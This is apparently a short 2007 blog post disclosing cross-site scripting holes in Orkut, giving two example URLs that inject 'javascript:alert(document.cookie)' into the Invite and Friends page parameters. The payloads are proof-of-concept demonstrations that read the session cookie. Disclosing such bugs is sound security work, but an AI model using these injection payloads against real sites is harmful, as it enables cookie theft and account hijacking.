9/7/07

Orkut CSS , XSS bugs

Orkut's several links can be used to inject java script !!!

like

http://www.orkut.com/Invite.aspx?continue=javascript:alert(document.cookie)

http://www.orkut.com/Friends.aspx?show=group1;alert(document.cookie)


Source

0 comments: